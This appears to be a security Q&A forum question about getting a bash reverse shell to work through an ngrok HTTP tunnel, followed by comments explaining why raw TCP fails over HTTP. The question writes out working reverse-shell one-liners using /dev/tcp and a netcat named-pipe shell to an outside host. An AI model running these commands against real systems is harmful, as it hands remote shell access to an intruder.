2

I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.

Locally over TCP:

  • Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1;
  • Success!

Remotely over HTTP:

  • Attacker runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Attacker runs ngrok to generate a web-facing IP: ./ngrok http --subdomain=example 8000
  • Target runs an interactive bash shell: bash -i >& /dev/tcp/example.ngrok.io/80 0>&1; (using port 80 because it's HTTP)
  • The connection fails; I don't even see any incoming traffic showing up on ngrok.

I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe (from this post)

Can anyone spot what I'm doing wrong?

NattyP
  • 21
  • 1
  • 1
    HTTP is a protocol on top of TCP. You actually have to speak this protocol on example.ngrok.io port 80. Just search for [reverse shell over http](https://www.google.com/search?q=reverse+shell+over+http) for more details on how this can be done. – Steffen Ullrich Jul 01 '20 at 16:31
  • @SteffenUllrich I don't completely understand what you mean. All incoming traffic to example.ngrok.io over port 80 should be picked up by ngrok, so I should see it, but I'm not. (I use ngrok frequently for development). The Google Search you attached is pretty broad. There are examples of reverse shells on this Stack Overflow post, and I am having difficulty getting them to work, for the same reason described above: https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell#35271982 – NattyP Jul 01 '20 at 16:43
  • Please have a look at [Wikipedia: HTTP](https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Example_session). That's the protocol which is expected to be spoken on the socket: HTTP requests and HTTP responses. ngrok http will not forward anything which does not adhere to the HTTP protocol. If you want to use pure bash you need some local gateway which encapsulates any data into HTTP messages and you have to have a similar gateway at the other end. – Steffen Ullrich Jul 01 '20 at 17:08
  • @SteffenUllrich Ahh ok. Are you saying the command `bash -i >& /dev/tcp/example.ngrok.io/80 0>&1` does not work over HTTP? I.e. it's TCP only? If so, are you saying it's not possible to use that command to make an interactive bash shell available to someone over the web? I also tried the netcat command listed below, and that didn't work for me either. Am I understanding you correctly? – NattyP Jul 01 '20 at 18:10
  • Yes, your command only works with plain TCP where no specific application layer protocol is required. – Steffen Ullrich Jul 01 '20 at 18:21
  • @SteffenUllrich You're saying both the `bash` command and the `nc` command examples I showed don't work over HTTP? If that's true, do you know what a correct command would be to get this to work over HTTP? – NattyP Jul 01 '20 at 18:50
  • I know that netcat does provide HTTP support - maybe I'm just not supplying the correct command? – NattyP Jul 01 '20 at 18:50
  • Let us [continue this discussion in chat](https://chat.stackexchange.com/rooms/110105/discussion-between-steffen-ullrich-and-nattyp). – Steffen Ullrich Jul 01 '20 at 19:35

0 Answers0